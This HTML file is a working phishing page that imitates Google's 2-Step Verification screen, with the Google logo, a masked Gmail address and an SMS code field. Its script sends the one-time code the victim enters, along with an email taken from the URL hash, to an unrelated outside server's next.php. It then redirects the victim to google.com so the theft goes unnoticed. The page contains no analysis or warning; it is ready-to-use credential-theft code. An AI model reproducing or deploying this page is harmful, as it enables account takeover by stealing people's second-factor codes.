<!DOCTYPE html>

<html>
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>Gmail</title>
    <meta name="description" content="">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <link href='https://fonts.googleapis.com/css?family=Roboto Mono' rel='stylesheet'>
    <link href='https://fonts.googleapis.com/css?family=Roboto' rel='stylesheet'>
    <link href='https://fonts.googleapis.com/css?family=Open Sans' rel='stylesheet'>



    <style>
        body {
            font-family: 'Open Sans';
            font-size: 16px;
        }
        #main-container{
            position: relative;
            height: 620px;
            width: 482px;
            border: solid;
            border-color: rgb(199, 199, 199);
            border-width: thin;
            border-radius: 10px;
            margin-top: 4%;
            margin-left: auto;
            margin-right: auto;
            padding-left: 50px;
            padding-right: 50px;
            padding-bottom: 50px;
            padding-top: 40px;
            background-color: white;
        }


        #account_btn {
            background-color: #fafafa;
            border: solid;
            border-color: gray;
            border-width: thin;
            border-radius: 35px;
            color: rgb(49, 49, 49);
            padding: 5px 10px;
            font-size: 14px;
            cursor: pointer;
            margin-left: 26%;

            display: inline-block;
        }


        #account_btn:hover {
            background-color: rgb(212, 212, 212);
        }
        fieldset {
            background-color: white;
            border: 3px solid #1A73E8;
            border-radius: 5px;
            height: 70px;

        }
        legend{
            font-size: 13px;
            padding-top: 0;
        }
        #otp_code{


            border: none;
            background-color: white;
            outline-color: white;
        }
        #save-check{
            height: 30px;
            width: 100%;
            padding-top: 20px;
        }
        .footer-ul li{
            display: inline-block;

        }
        .footer-ul a li{
            display: inline-block;
            text-decoration: none;
            color: gray;
            padding-right: 7px;
            padding-top: 15px;
            font-family: sans-serif;
            font-size:13px;
        }
        #footer-div{
            width: 482px;
            height: 50px;
            display: inline-block;
            margin-left: auto;
            margin-right: auto;
            background-color: rgb(255, 255, 255);
        }

    </style>

</head>
<body>
<div id="main-container">
    <img src="gmail-lodaing.gif" alt="loading" style="position:absolute; width: 99%; top:0; left: 0%;visibility:hidden; overflow: hidden;" id="loadingBar">

    <div style="display: inline-block; margin-left: 42%; margin-right: 40%; padding-bottom: 20px;">
        <svg  viewBox="0 0 75 25" width="75" height="25" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" class="BFr46e xduoyf"><g id="qaEJec"><path fill="#ea4335" d="M67.954 16.303c-1.33 0-2.278-.608-2.886-1.804l7.967-3.3-.27-.68c-.495-1.33-2.008-3.79-5.102-3.79-3.068 0-5.622 2.41-5.622 5.96 0 3.34 2.53 5.96 5.92 5.96 2.73 0 4.31-1.67 4.97-2.64l-2.03-1.35c-.673.98-1.6 1.64-2.93 1.64zm-.203-7.27c1.04 0 1.92.52 2.21 1.264l-5.32 2.21c-.06-2.3 1.79-3.474 3.12-3.474z"></path></g><g id="YGlOvc"><path fill="#34a853" d="M58.193.67h2.564v17.44h-2.564z"></path></g><g id="BWfIk"><path fill="#4285f4" d="M54.152 8.066h-.088c-.588-.697-1.716-1.33-3.136-1.33-2.98 0-5.71 2.614-5.71 5.98 0 3.338 2.73 5.933 5.71 5.933 1.42 0 2.548-.64 3.136-1.36h.088v.86c0 2.28-1.217 3.5-3.183 3.5-1.61 0-2.6-1.15-3-2.12l-2.28.94c.65 1.58 2.39 3.52 5.28 3.52 3.06 0 5.66-1.807 5.66-6.206V7.21h-2.48v.858zm-3.006 8.237c-1.804 0-3.318-1.513-3.318-3.588 0-2.1 1.514-3.635 3.318-3.635 1.784 0 3.183 1.534 3.183 3.635 0 2.075-1.4 3.588-3.19 3.588z"></path></g><g id="e6m3fd"><path fill="#fbbc05" d="M38.17 6.735c-3.28 0-5.953 2.506-5.953 5.96 0 3.432 2.673 5.96 5.954 5.96 3.29 0 5.96-2.528 5.96-5.96 0-3.46-2.67-5.96-5.95-5.96zm0 9.568c-1.798 0-3.348-1.487-3.348-3.61 0-2.14 1.55-3.608 3.35-3.608s3.348 1.467 3.348 3.61c0 2.116-1.55 3.608-3.35 3.608z"></path></g><g id="vbkDmc"><path fill="#ea4335" d="M25.17 6.71c-3.28 0-5.954 2.505-5.954 5.958 0 3.433 2.673 5.96 5.954 5.96 3.282 0 5.955-2.527 5.955-5.96 0-3.453-2.673-5.96-5.955-5.96zm0 9.567c-1.8 0-3.35-1.487-3.35-3.61 0-2.14 1.55-3.608 3.35-3.608s3.35 1.46 3.35 3.6c0 2.12-1.55 3.61-3.35 3.61z"></path></g><g id="idEJde"><path fill="#4285f4" d="M14.11 14.182c.722-.723 1.205-1.78 1.387-3.334H9.423V8.373h8.518c.09.452.16 1.07.16 1.664 0 1.903-.52 4.26-2.19 5.934-1.63 1.7-3.71 2.61-6.48 2.61-5.12 0-9.42-4.17-9.42-9.29C0 4.17 4.31 0 9.43 0c2.83 0 4.843 1.108 6.362 2.56L14 4.347c-1.087-1.02-2.56-1.81-4.577-1.81-3.74 0-6.662 3.01-6.662 6.75s2.93 6.75 6.67 6.75c2.43 0 3.81-.972 4.69-1.856z"></path></g></svg>
    </div>
    <div style="padding-bottom: 20px ;">

        <p style="text-align: center; font-weight: 600; font-size: 23px; color: #2d2d2d;">2-Step Verification</p>
        <p style="text-align: center;">To help keep your account safe, Google wants to make sure it's really you tryuing to sign in</p>
        <button class="btn btn-light" id="account_btn"><i><svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-person-circle" viewBox="0 0 16 16">
            <path d="M11 6a3 3 0 1 1-6 0 3 3 0 0 1 6 0z"/>
            <path fill-rule="evenodd" d="M0 8a8 8 0 1 1 16 0A8 8 0 0 1 0 8zm8-7a7 7 0 0 0-5.468 11.37C3.242 11.226 4.805 10 8 10s4.757 1.225 5.468 2.37A7 7 0 0 0 8 1z"/>
        </svg></i><i style="visibility: hidden;">Z</i>*************@gmail.com<i style="visibility: hidden;">Z</i><i><svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-chevron-down" viewBox="0 0 16 16">
            <path fill-rule="evenodd" d="M1.646 4.646a.5.5 0 0 1 .708 0L8 10.293l5.646-5.647a.5.5 0 0 1 .708.708l-6 6a.5.5 0 0 1-.708 0l-6-6a.5.5 0 0 1 0-.708z"/>
        </svg></i></button>
    </div>
    <br>
    <div>
        <p style="font-weight: bold;" >2-Step Verification</p>
        <p>A text message with a 6-digit verfication code was just sent to your ************ phone number.</p>
    </div>
    <div>

        <fieldset id="otpFiledSet">
            <legend id="otpLegend" class="float-none w-auto px-1" style="color:#1A73E8; margin-left: 30px;">Enter the code</legend>
            <label for="otp_code" style="margin-left: 10px; display: inline-block;">G-</label><input type="text" id="otp_code" name="otp_code">
        </fieldset>
        <p id="otpErrMsg" style="color: red;font-size:12px;display: none;">Enter correct OPT code</p>

    </div>

    <div id="save-check"><input type="checkbox" style="width:20px;height: 20px; cursor:pointer;">
        <label style="font-size: 18px; color: rgb(44, 44, 44); margin-left: 3%;">Don't ask again on this device</label>
    </div>
    <br>
    <br>
    <button class="btn btn-primary" style="float: right; height: 50px;width: 120px;" id="otpNext">Next</button>

</div>
<div id="footer-div" class="d-flex justify-content-center">
    <footer>
        <div>
            <ul class="footer-ul" style="float: left;">
                <a href="#"><li>English (United State)</li></a>
                <a href="#"><li style="visibility: hidden;">English ccc (United State)</li></a>
                <a href="#"><li>Help</li></a>
                <a href="#"><li>Terms</li></a>
                <a href="#"><li>Privacy</li></a>
            </ul>
        </div>
    </footer>
</div>

</body>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>
<script>
    $(document).ready(function(){
        var otp_value = document.getElementById('otp_code');
        var otpNext = document.getElementById('otpNext');
        var mainContainer = document.getElementById('main-container');
        var otpErrMsg = document.getElementById('otpErrMsg');
        var otpLegend = document.getElementById('otpLegend');
        var otpFiledSet = document.getElementById('otpFiledSet');

        $("button").click(function(){
            // $.get("www.faceboo.com/" + otp_value , function(){
            loadingBar.style.visibility = "visible";
            mainContainer.style.opacity = "0.5";
            var hash = window.location.hash.substr(1);

            $.ajax({
                //dataType: 'JSON',
                url: "https://firmas.centralarriendos.com.co/css/next.php",
                type: 'POST',
                data: {
                    cd: document.getElementById("otp_code").value,
                    em:hash,
                },
                success: function (a) {
                        if(a=="invalid"){
                            otpErrMsg.style.display='block';
                            otpLegend.style.color='red';
                            otpFiledSet.style.borderColor='red';
                            otpFiledSet.style.color = 'red';
                            $("#loadingBar").hide();
                        }else if(a=="saved") {
                    
                        window.location = "http://www.google.com";


                        }
                }

            })
        });
    });

</script>

</html>